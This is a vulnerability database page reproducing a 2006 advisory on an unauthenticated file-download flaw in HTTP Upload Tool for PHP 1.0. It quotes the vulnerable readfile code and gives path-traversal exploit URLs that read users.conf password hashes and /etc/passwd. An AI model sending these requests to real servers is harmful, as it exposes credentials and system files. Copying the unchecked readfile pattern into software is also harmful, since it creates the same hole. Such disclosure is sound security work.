Lucene search

K

HTTP Upload Tool (download.php) Information Disclosure Vulnerability

๐Ÿ—“๏ธย 16 Nov 2006ย 00:00:00Reported byย RootTypeย 
seebug
ย seebug
๐Ÿ”—ย www.seebug.org๐Ÿ‘ย 6ย Views

HTTP Upload Tool (download.php) Information Disclosure Vulnerability. Unauthenticated users can download any file, including users.conf containing hashed password

Show more
Code

                                                #######################################################################################
# Target:
#
#       HTTP Upload Tool For PHP 1.0
#       http://uploadtool.sourceforge.net/
#
# Vulnerability:
#
#       Information disclosure
#
# Description:
#
#       The download.php file in Upload Tool for PHP neither verifies that a
#       requestor has authenticated, nor performs any sanity checking on the file
#       being requested. This allows an unauthenticated user to download any file
#       which the web server has read rights to, including the users.conf file which
#       contains a list of Upload Tool's users and their hashed passwords.
#
# Vulnerable Code (truncated):
#
#       $filename = $_GET['filename'];
#       readfile("$filename");
#
# Exploit:
#
#       http://www.examplesite.com/upload/bin/download.php?filename=../conf/users.conf
#       http://www.examplesite.com/upload/bin/download.php?filename=/etc/passwd
#
# Discovered:
#
#       Craig Heffner
#       heffnercj [at] gmail.com
#       http://www.craigheffner.com
#######################################################################################

# milw0rm.com [2006-11-16]

                              

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contactย us for a demo andย discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
16 Nov 2006 00:00Current
7.1High risk
Vulners AI Score7.1
6
.json
Report